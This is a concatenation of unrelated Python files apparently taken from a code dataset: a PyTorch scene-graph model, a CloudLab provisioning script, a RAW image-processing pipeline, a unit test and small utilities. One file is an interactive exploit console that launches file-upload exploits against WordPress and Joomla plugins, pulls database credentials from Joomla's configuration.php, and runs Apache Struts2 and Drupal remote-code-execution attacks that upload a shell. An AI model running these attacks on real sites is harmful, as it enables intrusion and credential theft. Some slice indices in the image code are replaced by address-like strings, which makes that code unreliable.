else:
models['rel_predictor'] = PointNetRelCls(
num_rel,
in_size=mconfig.edge_feature_size,
batch_norm=with_bn,drop_out=True)
params = list()
print('==trainable parameters==')
for name, model in models.items():
if len(config.GPU) > 1:
model = torch.nn.DataParallel(model, config.GPU)
self.add_module(name, model)
params += list(model.parameters())
print(name,op_utils.pytorch_count_params(model))
print('')
self.optimizer = optim.Adam(
params = params,
lr = float(config.LR),
)
self.optimizer.zero_grad()
def forward(self, obj_points, rel_points, edges, return_meta_data=False):
obj_feature = self.obj_encoder(obj_points)
rel_feature = self.rel_encoder(rel_points)
probs=None
if self.mconfig.USE_GCN:
if self.mconfig.GCN_TYPE == 'TRIP':
gcn_obj_feature, gcn_rel_feature = self.gcn(obj_feature, rel_feature, edges)
elif self.mconfig.GCN_TYPE == 'EAN':
gcn_obj_feature, gcn_rel_feature, probs = self.gcn(obj_feature, rel_feature, edges)
if self.mconfig.OBJ_PRED_FROM_GCN:
obj_cls = self.obj_predictor(gcn_obj_feature)
else:
obj_cls = self.obj_predictor(obj_feature)
rel_cls = self.rel_predictor(gcn_rel_feature)
else:
gcn_obj_feature=gcn_rel_feature=None
obj_cls = self.obj_predictor(obj_feature)
rel_cls = self.rel_predictor(rel_feature)
if return_meta_data:
return obj_cls, rel_cls, obj_feature, rel_feature, gcn_obj_feature, gcn_rel_feature, probs
else:
return obj_cls, rel_cls
def process(self, obj_points, rel_points, edges, gt_obj_cls, gt_rel_cls, weights_obj=None, weights_rel=None):
self.iteration +=1
obj_pred, rel_pred, _, _, _, _, probs = self(obj_points, rel_points, edges,return_meta_data=True)
# if self.mconfig.multi_rel_outputs:
# if self.mconfig.w_bg != 0:
# weight_FG_BG = self.mconfig.w_bg * (1 - gt_rel_cls) + (1 - self.mconfig.w_bg) * gt_rel_cls
# else:
# weight_FG_BG = None
# loss_rel = F.binary_cross_entropy(rel_pred, gt_rel_cls, weight=weight_FG_BG)
# else:
# raise NotImplementedError('')
loss_obj = F.nll_loss(obj_pred, gt_obj_cls, weight = weights_obj)
if self.mconfig.multi_rel_outputs:
weight_FG_BG = None
loss_rel = F.binary_cross_entropy(rel_pred, gt_rel_cls, weight=weight_FG_BG)
else:
loss_rel = F.nll_loss(rel_pred, gt_rel_cls, weight=None)
loss = self.mconfig.lambda_o * loss_obj + loss_rel
self.backward(loss)
logs = [("Loss/cls_loss",loss_obj.detach().item()),
("Loss/rel_loss",loss_rel.detach().item()),
("Loss/loss", loss.detach().item())]
return logs, obj_pred.detach(), rel_pred.detach(), probs
def backward(self, loss):
loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
def norm_tensor(self, points, dim):
# points.shape = [n, 3, npts]
centroid = torch.mean(points, dim=-1).unsqueeze(-1) # N, 3
points -= centroid # n, 3, npts
furthest_distance = points.pow(2).sum(1).sqrt().max(1)[0] # find maximum distance for each n -> [n]
points /= furthest_distance[0]
return points
def calculate_metrics(self, preds, gts):
assert(len(preds)==2)
assert(len(gts)==2)
obj_pred = preds[0].detach()
rel_pred = preds[1].detach()
obj_gt = gts[0]
rel_gt = gts[1]
pred_cls = torch.max(obj_pred.detach(),1)[1]
acc_obj = (obj_gt == pred_cls).sum().item() / obj_gt.nelement()
pred_rel= rel_pred.detach() > 0.5
acc_rel = (rel_gt==pred_rel).sum().item() / rel_gt.nelement()
logs = [("Accuracy/obj_cls",acc_obj),
("Accuracy/rel_cls",acc_rel)]
return logs
if __name__ == '__main__':
use_dataset = True
config = Config('../config_example.json')
config.MODEL.USE_RGB=False
config.MODEL.USE_NORMAL=False
if not use_dataset:
num_obj_cls=40
num_rel_cls=26
else:
from src.dataset_builder import build_dataset
config.dataset.dataset_type = 'rio_graph'
dataset =build_dataset(config, 'validation_scans', True, multi_rel_outputs=True, use_rgb=False, use_normal=False)
num_obj_cls = len(dataset.classNames)
num_rel_cls = len(dataset.relationNames)
# build model
mconfig = config.MODEL
network = SGPNModel(config,'SGPNModel',num_obj_cls,num_rel_cls)
if not use_dataset:
max_rels = 80
n_pts = 10
n_rels = n_pts*n_pts-n_pts
n_rels = max_rels if n_rels > max_rels else n_rels
obj_points = torch.rand([n_pts,3,128])
rel_points = torch.rand([n_rels, 4, 256])
edges = torch.zeros(n_rels, 2,dtype=torch.long)
counter=0
for i in range(n_pts):
if counter >= edges.shape[0]: break
for j in range(n_pts):
if i==j:continue
if counter >= edges.shape[0]: break
edges[counter,0]=i
edges[counter,1]=i
counter +=1
obj_gt = torch.randint(0, num_obj_cls-1, (n_pts,))
rel_gt = torch.randint(0, num_rel_cls-1, (n_rels,))
# rel_gt
adj_rel_gt = torch.rand([n_pts, n_pts, num_rel_cls])
rel_gt = torch.zeros(n_rels, num_rel_cls, dtype=torch.float)
for e in range(edges.shape[0]):
i,j = edges[e]
for c in range(num_rel_cls):
if adj_rel_gt[i,j,c] < 0.5: continue
rel_gt[e,c] = 1
network.process(obj_points,rel_points,edges,obj_gt,rel_gt)
for i in range(100):
if use_dataset:
scan_id, instance2mask, obj_points, rel_points, obj_gt, rel_gt, edges = dataset.__getitem__(i)
obj_points = obj_points.permute(0,2,1)
rel_points = rel_points.permute(0,2,1)
logs, obj_pred, rel_pred = network.process(obj_points,rel_points,edges,obj_gt,rel_gt)
logs += network.calculate_metrics([obj_pred,rel_pred], [obj_gt,rel_gt])
# pred_cls = torch.max(obj_pred.detach(),1)[1]
# acc_obj = (obj_gt == pred_cls).sum().item() / obj_gt.nelement()
# rel_pred = rel_pred.detach() > 0.5
# acc_rel = (rel_gt==(rel_pred>0)).sum().item() / rel_pred.nelement()
# print('{0:>3d} acc_obj: {1:>1.4f} acc_rel: {2:>1.4f} loss: {3:>2.3f}'.format(i,acc_obj,acc_rel,logs[0][1]))
print('{:>3d} '.format(i),end='')
for log in logs:
print('{0:} {1:>2.3f} '.format(log[0],log[1]),end='')
print('')
| StarcoderdataPython |
6644109 | import os
from geni.aggregate import cloudlab
from geni.rspec import pg
from geni import util
def baremetal_node(name, img, hardware_type):
node = pg.RawPC(name)
node.disk_image = img
node.hardware_type = hardware_type
return node
experiment_name = 'popper-examples'
img = "urn:publicid:IDN+clemson.cloudlab.us+image+schedock-PG0:ubuntu18-docker"
request = pg.Request()
request.addResource(baremetal_node("client", img, 'c6320'))
request.addResource(baremetal_node("server", img, 'c6320'))
# load context
ctx = util.loadContext(key_passphrase=os.environ['GENI_KEY_PASSPHRASE'])
# create slice
util.createSlice(ctx, experiment_name, renew_if_exists=True)
# create sliver on clemson
manifest = util.createSliver(ctx, cloudlab.Clemson, experiment_name, request)
# output files: ansible inventory and GENI manifest
# {
outdir = os.path.dirname(os.path.realpath(__file__))
util.toAnsibleInventory(manifest, hostsfile=outdir+'/hosts')
manifest.writeXML(outdir+'/manifest.xml')
# }
| StarcoderdataPython |
5088744 | """ Simple RAW image processing module"""
import sys
import os
import scipy
from scipy import signal
import numpy as np
from numpy.lib.stride_tricks import as_strided
import rawpy
""" Process RAW file into a image file.
Example usage:
raw = read("sample.ARW")
rgb = process(raw)
write(rgb, "output.ARW")
"""
def read(filename):
"""
Read RAW data from specified file. Currently supported formats are
ARW (Sony RAW format)
JPEG with Raspberry Pi V2.1 camera RAW
:param filename: path to the target RAW file
"""
return rawpy.imread(filename)
def check_functions(filename):
""" Check what functions to be enabled based on filename"""
white_level = 1024
shading_enable = True
defect_correction_enable = True
noise_parameters = (8, 2, 246)
wbg_norm = 1
extension = os.path.splitext(filename)[1]
if extension in (".ARW", ".arw"):
shading_enable = False
defect_correction_enable = False
white_level = 8192
noise_parameters = (8, 0.2, 25)
wbg_norm = 1024
return (shading_enable, defect_correction_enable, white_level, wbg_norm, noise_parameters)
DEFALT_MATRIX = (1024, 0, 0, 0, 1024, 0, 0, 0, 1024)
DEFALT_TONE = ((0, 64, 128, 192, 256), (0, 64, 128, 192, 256))
def process(filename, output_filename, color_matrix=DEFALT_MATRIX, tone_curve=DEFALT_TONE):
"""
This processes RAW data that was read by read() method.
Must be called after read() operation. No error is checked.
"""
shading_enable, defect_crrection_enable, white_level, wbg_norm, noise_param = check_functions(filename)
raw = read(filename)
raw_array = get_raw_array(raw)
raw_array = black_level_correction(raw_array, raw.black_level_per_channel, raw.raw_pattern)
if defect_crrection_enable:
raw_array = defect_crrection(raw_array)
if shading_enable:
raw_array = lens_shading_correction(raw_array, LSC_DEFAULT)
raw_array = white_balance_Bayer(raw_array, raw.camera_whitebalance, wbg_norm, raw.raw_pattern)
rgb_array = advanced_demosaic(raw_array, raw.raw_pattern)
del raw_array, raw
rgb_array = noise_filter(rgb_array, noise_param[0], noise_param[1], noise_param[2])
rgb_array = color_correction_matrix(rgb_array, color_matrix)
rgb_array = gamma_correction(rgb_array/white_level, 2.2)
rgb_array = edge_correction(rgb_array, 2, 0.25, 1, 0.25)
rgb_array = tone_curve_correction(rgb_array, tone_curve[0], tone_curve[1])
write(rgb_array, output_filename)
def get_raw_array(raw):
""" convert raw_img into numpy array"""
h, w = raw.sizes.raw_height, raw.sizes.raw_width
raw_array = np.array(raw.raw_image).reshape((h, w)).astype('float')
return raw_array
def black_level_correction(raw_array, black_level_per_channel, bayer_pattern):
# rearrange black level
black_level = [0] * 4
black_level[bayer_pattern[0, 0]] = black_level_per_channel[bayer_pattern[0, 0]]
black_level[bayer_pattern[0, 1]] = black_level_per_channel[bayer_pattern[0, 1]]
black_level[bayer_pattern[1, 0]] = black_level_per_channel[bayer_pattern[1, 0]]
black_level[bayer_pattern[1, 1]] = black_level_per_channel[bayer_pattern[1, 1]]
blc_raw = raw_array.copy()
blc_raw[0::2, 0::2] -= black_level[0]
blc_raw[fc00:e968:6179::de52:7100, 1::2] -= black_level[1]
blc_raw[fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 0::2] -= black_level[2]
blc_raw[fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 1::2] -= black_level[3]
return blc_raw
def defect_crrection(raw_array):
dpc_raw = raw_array.copy()
footprint = np.ones((5, 5))
footprint[2, 2] = 0
for (yo, xo) in ((0, 0), (1, 0), (0, 1), (1, 1)):
single_channel = dpc_raw[yo::2, xo::2]
flt = np.array([[0, 1, 0], [1, 0, 1], [0, 1, 0]]) / 4
average = scipy.signal.convolve2d(single_channel, flt, mode='same')
local_max = scipy.ndimage.filters.maximum_filter(single_channel, footprint=footprint, mode='mirror')
local_min = scipy.ndimage.filters.minimum_filter(single_channel, footprint=footprint, mode='mirror')
threshold = 16
mask = (single_channel < local_min - threshold) + (single_channel > local_max + threshold)
single_channel[mask] = average[mask]
return dpc_raw
LSC_DEFAULT = [np.array([6.07106808e-07, 9.60556906e-01]),
np.array([6.32044369e-07, 9.70694361e-01]),
np.array([6.28455183e-07, 9.72493898e-01]),
np.array([9.58743579e-07, 9.29427169e-01])]
def lens_shading_correction(raw, coef):
"""
Apply lens shading correction to Bayer input (raw)
Parameter (coef) needs to be array type of coef[4][2]
coef[color][0] is coefficient on 2nd order term.
coef[color][1] is offset
"""
h, w = raw.shape
gain_map = np.zeros((h, w))
center_y, center_x = h // 2, w // 2
x = np.arange(0, w) - center_x
y = np.arange(0, h) - center_y
xs, ys = np.meshgrid(x, y, sparse=True)
r2 = ys * ys + xs * xs
gain_map[::2, ::2] = r2[::2, ::2] * coef[0][0] + coef[0][1]
gain_map[1::2, ::2] = r2[1::2, ::2] * coef[1][0] + coef[1][1]
gain_map[::2, 1::2] = r2[::2, 1::2] * coef[2][0] + coef[2][1]
gain_map[1::2, 1::2] = r2[1::2, 1::2] * coef[3][0] + coef[3][1]
return raw * gain_map
def preview_demosaic(raw_array, bayer_pattern):
""" Very simple demosaic with down sampling for preview purpose"""
h, w = raw_array.shape[0], raw_array.shape[1]
shuffle = np.zeros((h // 2, w // 2, 4))
shuffle[:, :, bayer_pattern[0, 0]] += raw_array[0::2, 0::2]
shuffle[:, :, bayer_pattern[0, 1]] += raw_array[0::2, 1::2]
shuffle[:, :, bayer_pattern[1, 0]] += raw_array[1::2, 0::2]
shuffle[:, :, bayer_pattern[1, 1]] += raw_array[1::2, 1::2]
dms_img = np.zeros((h // 2, w // 2, 3))
dms_img[:, :, 0] = shuffle[:, :, 0]
dms_img[:, :, 1] = (shuffle[:, :, 1] + shuffle[:, :, 3]) / 2
dms_img[:, :, 2] = shuffle[:, :, 2]
return dms_img
def simple_demosaic(raw, raw_array):
""" Simple demosaic algorithm with linear interpolation """
h, w = raw_array.shape
dms_img2 = np.zeros((h, w, 3))
green = raw_array.copy()
green[(raw.raw_colors == 0) | (raw.raw_colors == 2)] = 0
g_flt = np.array([[0, 1 / 4, 0], [1 / 4, 1, 1 / 4], [0, 1 / 4, 0]])
dms_img2[:, :, 1] = signal.convolve2d(green, g_flt, boundary='symm', mode='same')
red = raw_array.copy()
red[raw.raw_colors != 0] = 0
rb_flt = np.array([[1 / 4, 1 / 2, 1 / 4], [1 / 2, 1, 1 / 2], [1 / 4, 1 / 2, 1 / 4]])
dms_img2[:, :, 0] = signal.convolve2d(red, rb_flt, boundary='symm', mode='same')
blue = raw_array.copy()
blue[raw.raw_colors != 2] = 0
rb_flt = np.array([[1 / 4, 1 / 2, 1 / 4], [1 / 2, 1, 1 / 2], [1 / 4, 1 / 2, 1 / 4]])
dms_img2[:, :, 2] = signal.convolve2d(blue, rb_flt, boundary='symm', mode='same')
return dms_img2
def advanced_demosaic(dms_input, bayer_pattern):
""" Demosaic algorithm in frequency domain """
hlpf = np.array([[1, 2, 3, 4, 3, 2, 1]]) / 16
vlpf = np.transpose(hlpf)
hhpf = np.array([[-1, 2, -3, 4, -3, 2, -1]]) / 16
vhpf = np.transpose(hhpf)
identity_filter = np.zeros((7, 7))
identity_filter[3, 3] = 1
# generate FIR filters to extract necessary components
FC1 = np.matmul(vhpf, hhpf)
FC2H = np.matmul(vlpf, hhpf)
FC2V = np.matmul(vhpf, hlpf)
FL = identity_filter - FC1 - FC2V - FC2H
# f_C1 at 4 corners
c1_mod = signal.convolve2d(dms_input, FC1, boundary='symm', mode='same')
# f_C1^1 at wy = 0, wx = +Pi/-Pi
c2h_mod = signal.convolve2d(dms_input, FC2H, boundary='symm', mode='same')
# f_C1^1 at wy = +Pi/-Pi, wx = 0
c2v_mod = signal.convolve2d(dms_input, FC2V, boundary='symm', mode='same')
# f_L at center
f_L = signal.convolve2d(dms_input, FL, boundary='symm', mode='same')
# Move c1 to the center by shifting by Pi in both x and y direction
# f_c1 = c1 * (-1)^x * (-1)^y
f_c1 = c1_mod.copy()
f_c1[:, 1::2] *= -1
f_c1[1::2, :] *= -1
if bayer_pattern[0, 0] == 1 or bayer_pattern[0, 0] == 3:
f_c1 *= -1
# Move c2a to the center by shifting by Pi in x direction, same for c2b in y direction
c2h = c2h_mod.copy()
c2h[:, 1::2] *= -1
if bayer_pattern[0, 0] == 2 or bayer_pattern[1, 0] == 2:
c2h *= -1
c2v = c2v_mod.copy()
c2v[1::2, :] *= -1
if bayer_pattern[0, 0] == 2 or bayer_pattern[0, 1] == 2:
c2v *= -1
# f_c2 = (c2v_mod * x_mod + c2h_mod * y_mod) / 2
f_c2 = (c2v + c2h) / 2
# generate RGB channel using
# [R, G, B] = [[1, 1, 2], [1, -1, 0], [1, 1, - 2]] x [L, C1, C2]
height, width = dms_input.shape
dms_img = np.zeros((height, width, 3))
dms_img[:, :, 0] = f_L + f_c1 + 2 * f_c2
dms_img[:, :, 1] = f_L - f_c1
dms_img[:, :, 2] = f_L + f_c1 - 2 * f_c2
return dms_img
def white_balance_Bayer(raw_array, wbg, wbg_norm, bayer_pattern):
""" Apply white balance to bayer input"""
img_wb = raw_array.copy()
img_wb[0::2, 0::2] *= wbg[bayer_pattern[0, 0]] / wbg_norm
img_wb[0::2, 1::2] *= wbg[bayer_pattern[0, 1]] / wbg_norm
img_wb[1::2, 0::2] *= wbg[bayer_pattern[1, 0]] / wbg_norm
img_wb[1::2, 1::2] *= wbg[bayer_pattern[1, 1]] / wbg_norm
return img_wb
def noise_filter(rgb_array, coef=8, read_noise=2, shot_noise=246):
""" Apply bilateral noise filter to RGB image"""
h, w, _ = rgb_array.shape
luma_img = rgb_array[:, :, 0] + rgb_array[:, :, 1] + rgb_array[:, :, 2]
average = scipy.ndimage.filters.uniform_filter(luma_img, 5, mode='mirror')
sigma_map = average * shot_noise + read_noise
del average
sigma_map[sigma_map < 1] = 1
sy, sx = sigma_map.strides
sigma_tile = as_strided(sigma_map, strides=(sy, sx, 0, 0), shape=(h, w, 5, 5))
sigma_tile = sigma_tile[2:h-2, 2:w-2, :, :]
del sigma_map
sy, sx = luma_img.strides
luma_tile = as_strided(luma_img, strides=(sy, sx, 0, 0), shape=(h, w, 5, 5))
luma_tile = luma_tile[2:h-2, 2:w-2, :, :]
luma_box = as_strided(luma_img, strides=(sy, sx, sy, sx), shape=(h-4, w-4, 5, 5))
del luma_img
diff = luma_box - luma_tile
del luma_tile, luma_box
diff = diff * diff
weight = np.exp(-coef * diff / sigma_tile)
del diff, sigma_tile
weight_sum = weight.sum(axis=(2, 3))
sy, sx, sz, sw = weight.strides
weight_extend = as_strided(weight, strides=(sy, sx, 0, sz, sw), shape=(h-4, w-4, 3, 5, 5))
del weight
sy, sx = weight_sum.strides
weight_sum_extend = as_strided(weight_sum, strides=(sy, sx, 0), shape=(h-4, w-4, 3))
del weight_sum
sy, sx, sz = rgb_array.strides
img_boxes = as_strided(rgb_array, strides=(sy, sx, sz, sy, sx), shape=(h-4, w-4, 3, 5, 5))
img_flt = (weight_extend * img_boxes).sum(axis=(3, 4)) / weight_sum_extend
return img_flt
def color_correction_matrix(rgb_array, color_matrix):
""" Apply color correction matrix to RGB array"""
img_ccm = np.zeros_like(rgb_array)
ccm = np.array(color_matrix).reshape((3, 3))
norm = ccm.sum(axis=1).mean()
for c in (0, 1, 2):
img_ccm[:, :, c] = ccm[c, 0] * rgb_array[:, :, 0] + \
ccm[c, 1] * rgb_array[:, :, 1] + \
ccm[c, 2] * rgb_array[:, :, 2]
return img_ccm / norm
def gamma_correction(rgb_array, gamma_coef):
""" Apply gamma correction to RGB image"""
img_gamma = rgb_array.copy()
img_gamma[img_gamma < 0] = 0
img_gamma = np.power(img_gamma, 1/gamma_coef)
return img_gamma
def apply_matrix(input_array, matrix):
img_out = np.zeros_like(input_array)
for c in (0, 1, 2):
img_out[:, :, c] = matrix[c, 0] * input_array[:, :, 0] + \
matrix[c, 1] * input_array[:, :, 1] + \
matrix[c, 2] * input_array[:, :, 2]
return img_out
RGB_TO_YCBCR = np.array([[0.299, 0.587, 0.144],
[-0.168736, -0.331264, 0.5],
[0.5, -0.418688, -0.081312]])
def edge_correction(rgb_array, sigma1=2, coef1=0.25, sigma2=1, coef2=0.25):
""" Edge correction for RGB input"""
img_rgb = rgb_array.copy() * 256
img_rgb[img_rgb < 0] = 0
img_rgb[img_rgb > 255] = 255
img_ycbcr = apply_matrix(img_rgb, RGB_TO_YCBCR)
luma = img_ycbcr[:, :, 0]
unsharpen1 = scipy.ndimage.gaussian_filter(luma, sigma=sigma1)
unsharpen2 = scipy.ndimage.gaussian_filter(luma, sigma=sigma2)
sharpen = luma + coef1 * (luma - unsharpen1) + coef2 * (luma - unsharpen2)
img_ycbcr[:, :, 0] = sharpen
ycbcr2rgb = np.linalg.inv(RGB_TO_YCBCR)
img_shp_rgb = apply_matrix(img_ycbcr, ycbcr2rgb) / 256
img_shp_rgb[img_shp_rgb < 0] = 0
img_shp_rgb[img_shp_rgb > 1] = 1
return img_shp_rgb
def tone_curve_correction(img_rgb, xs=(0, 64, 128, 192, 256), ys=(0, 64, 128, 192, 256)):
func = scipy.interpolate.splrep(xs, ys)
img_ycbcr = apply_matrix(img_rgb * 256, RGB_TO_YCBCR)
img_ycbcr[:, :, 0] = scipy.interpolate.splev(img_ycbcr[:, :, 0], func)
ycbcr2rgb = np.linalg.inv(RGB_TO_YCBCR)
img_rgb_out = apply_matrix(img_ycbcr, ycbcr2rgb)
return img_rgb_out / 256
def write(rgb_image, output_filename):
"""
Write the processed RGB image to a specified file as PNG format.
Thsi must be called after process(). No error is checked.
:param output_filename: path to the output file. Extension must be png.
"""
import imageio
outimg = rgb_image.copy() * 256
outimg[outimg < 0] = 0
outimg[outimg > 255] = 255
imageio.imwrite(output_filename, outimg.astype('uint8'))
def main(argv):
""" main function """
if (len(argv) < 2):
print("Usage: {} input_filename [output_filename] \"color_matrix\" \"tone_x\" \"tone_y\"".format(argv[0]))
print("\tDefault output_filename is output.png")
print("\tDefault matrix is identity matrix \"1024, 0, 0, 0, 1024, 0, 0, 0, 1024\"")
print("\tDefault tone curve is identity function \"0, 128, 256] [0, 128, 256\"")
print("\tExample: python3 {} sample.ARW sample.png \"1141, -205, 88, -52, 1229, -154, 70, -225, 1179\" \"0, 72, 128, 200, 256\" \"0, 56, 128, 220, 256\"".format(argv[0]))
print("\tSupported RAW format is ARW (Sony RAW) and Raspberry Pi (embedded in JPEG)")
print("\tSupported output format is PNG only")
return
filename = argv[1]
output_filename = "output.png"
color_matrix = [1024, 0, 0, 0, 1024, 0, 0, 0, 1024]
tone_curve = [(0, 64, 128, 192, 256), (0, 64, 128, 192, 256)]
if len(argv) > 2:
output_filename = argv[2]
if len(argv) > 3:
color_matrix = [int(value) for value in (argv[3]).split(',')]
if len(argv) > 4:
tone_curve[0] = [int(value) for value in (argv[4]).split(',')]
if len(argv) > 5:
tone_curve[1] = [int(value) for value in (argv[5]).split(',')]
process(filename, output_filename, color_matrix, tone_curve)
if __name__ == "__main__":
main(sys.argv)
| StarcoderdataPython |
9654978 | <gh_stars>10-100
# -*- coding: utf-8 -*-
"""Tests for the All-CNN-C architecture on the CIFAR-100 dataset."""
import os
import sys
import unittest
import tensorflow as tf
import numpy as np
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
from deepobs.tensorflow import testproblems
class Cifar100_AllCNNCTest(unittest.TestCase):
"""Test for the All-CNN-C architecture on the CIFAR-100 dataset."""
def setUp(self):
"""Sets up CIFAR-100 dataset for the tests."""
self.batch_size = 100
self.cifar100_allcnnc = testproblems.cifar100_allcnnc(self.batch_size)
def test_init_ops(self):
"""Tests all three initialization operations."""
tf.reset_default_graph()
tf.set_random_seed(42)
self.cifar100_allcnnc.set_up()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
num_param = [
np.prod(v.get_shape().as_list())
for v in tf.trainable_variables()
]
# Check if number of parameters per "layer" is equal to what we expect
# We will write them in the following form:
# - Conv layer: [input_filter*output_filter*kernel[0]*kernel[1]]
# - Batch norm: [input, input] (for beta and gamma)
# - Fully connected: [input*output]
# - Bias: [dim]
self.assertEqual(num_param, [
3 * 96 * 3 * 3, 96, 96 * 96 * 3 * 3, 96, 96 * 96 * 3 * 3, 96,
96 * 192 * 3 * 3, 192, 192 * 192 * 3 * 3, 192,
192 * 192 * 3 * 3, 192, 192 * 192 * 3 * 3, 192,
192 * 192 * 1 * 1, 192, 192 * 100 * 1 * 1, 100
])
for init_op in [
self.cifar100_allcnnc.train_init_op,
self.cifar100_allcnnc.test_init_op,
self.cifar100_allcnnc.train_eval_init_op
]:
sess.run(init_op)
losses_, regularizer_, accuracy_ = sess.run([
self.cifar100_allcnnc.losses,
self.cifar100_allcnnc.regularizer,
self.cifar100_allcnnc.accuracy
])
self.assertEqual(losses_.shape, (self.batch_size, ))
self.assertIsInstance(regularizer_, np.float32)
self.assertIsInstance(accuracy_, np.float32)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3391694 | #-*- coding: utf-8 -*-
from .lib import (
uploadhandler,
post_data,
drupal_rce,
apache_struts2,
dvr,
wp_content_inject,
)
from .utils import (
exploit_modules,
description,
show,
log,
proto,
upload_debug,
json_respon
)
import readline,requests,re
log = log(__name__)
sss = []
for i in exploit_modules:
xx = exploit_modules[i]
for x in xx:
sss.append(x)
def main():
wp = exploit_modules['wordpress']
jom = exploit_modules['joomla']
oth = exploit_modules['other']
T = 'url: '
F = 'path file: '
N = 'upload with name: '
while True:
try:
inp = input('zsf(\033[91mexploit\033[0m): ').lower()
if inp == wp[0]:
x = wp_content_inject(proto(input(T)))
ver = x.get_version()
if ver == 'not vuln':
log(30,f'not vulnerabilty')
else:
if ver == '4.7' or ver == '4.7.1':
ttl = input('post title: ')
ctn = input('post content: ')
log.log(10,'injecting content....')
for i in x.get_id():
p = x.post_content(ttl,ctn,i)
log.log(10,f'postID: {i} status: {p.status_code}')
else:
log.log(30,f'not vulnerability for version {ver}')
elif inp == wp[1]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_revslider
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[2]:
url = proto(input(T))
pth = input(F)
nm = input(N)
pd = post_data(pth,nm).wp_learndash
x = uploadhandler(url,path1='/',path2=pd[1],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[3]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_showbiz
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[4]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_audio_control
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[5]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_geoplace3
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=None,files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[6]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_pugeot_music
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == jom[0]:
url = proto(input(T))
pd = post_data(input(F),input(N)).com_fabrik
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == jom[1]:
url = proto(input(T))
pd = post_data(input(F),input(N)).com_ads_manager
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == jom[2]:
url = proto(input(T))
r = requests.get(f'{url}/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',verify=False)
if 'JConfig' in r.text:
host = re.findall("host = '(.*)';",r.text)
user = re.findall("user = '(.*)';",r.text)
pw = re.findall("password = '(.*)';",r.text)
db = re.findall("db = '(.*)';",r.text)
for i in [host,user,pw,db]:
log.log(10,f'{i}')
else:
log.log(30,'not vulnerability')
elif inp == jom[3]:
url = proto(input(T))
pd = post_data(input(F),input(N)).com_jdownloads(input('Email: '))
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == oth[0]:
url = proto(input(T))
f = input(F)
n = input(N)
r = requests.put(
f'{url}/n',
data = open(f,'r').read(),
headers = {
'Content-Type':'application/octet-stream'
}
)
rr = requests.get(f'{url}/n')
upload_debug(r,rr)
elif inp == oth[1]:
url = proto(input(T))
pd = post_data(input(F),input(N)).elfinder
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=None)
upload_debug(x.post(),x.get_check())
elif inp == oth[2]:
x = apache_struts2(proto(input(T)))
log.log(10,'checking vulnerability')
if x.check() == 'vuln':
log.log(50,'vulnerability')
x.execute_shell()
else:
log.log(30,f'not vulnerability')
elif inp == oth[3]:
x = drupal_rce(proto(input(T)))
log.log(10,'checking version..')
ver = x.version()
if ver == '8':
log.log(10,'detecting version 8')
log.log(10,'testing vulnerability....')
log.log(10,'uploading shell...')
p = x.upload_shell(ver)
log.log(10,f'status: {p.status_code}')
x.check_shell()
if x.path_shell == '':
log.log(30,'not vulnerability')
else:
log.log(50,'target vulnerability')
log.log(10,'starting remote command execution..')
x.execute_shell(x.path_shell)
else:
log.log(40,'the target does not use drupal webapp')
elif inp == oth[4]:
x = drupal_rce(proto(input(T)))
log.log(10,'checking version..')
ver = x.version()
if ver == '7':
log.log(10,'detecting version 7')
log.log(10,'testing vulnerability....')
log.log(10,'uploading shell...')
p = x.upload_shell(ver)
log.log(10,f'status: {p.status_code}')
x.check_shell()
if x.path_shell == '':
log.log(30,'not vulnerability')
else:
log.log(50,'target vulnerability')
log.log(10,'starting remote command execution..')
x.execute_shell(x.path_shell)
else:
log.log(40,'the target does not use drupal webapp')
elif inp == oth[5]:
url = proto(input(T))
x = dvr(url)
log.log(10,'getting config....')
p = x.request_get()
if p == 'not vuln':
log.log(30,'target not vulnerability')
else:
json_respon(p)
elif inp == 'back':
break
elif inp == 'exit':
exit()
elif inp == 'help':
show(sss,description['exploit'])
else:
print(f'\033[91m!\033[0m no command {inp}')
except Exception as e:
print(e)
except KeyboardInterrupt:
exit()
| StarcoderdataPython |
316588 | class EventNotFound(Exception):
"""Handles invalid event type provided to
publishers
Attributes:
event_type --> the event that's invalid
message --> additional message to log or print
"""
def __init__(self, event_type: str, message: str ="invalid event"):
self.event_type = event_type
self.message = message
def __repr__(self):
return f"{self.event_type} --> {self.message}"
class UnexpectedError(Exception):
"""Handles unknown errors
Attributes:
message --> additional message to log or print
"""
def __init__(self, message: str ="unexpected error occured"):
self.message = message
def __repr__(self):
return {self.message}
class NotFoundError(Exception):
"""Handles not found
Attributes:
message --> additional message to log or print
"""
def __init__(self, message: str ="element not found"):
self.message = message
def __repr__(self):
return {self.message} | StarcoderdataPython |
3295723 | #-------------------------------
print("FUNCTION BINARYSTRING")
import FunctionBinaryString.Convert
import FunctionBinaryString.Decode
import FunctionBinaryString.Encode
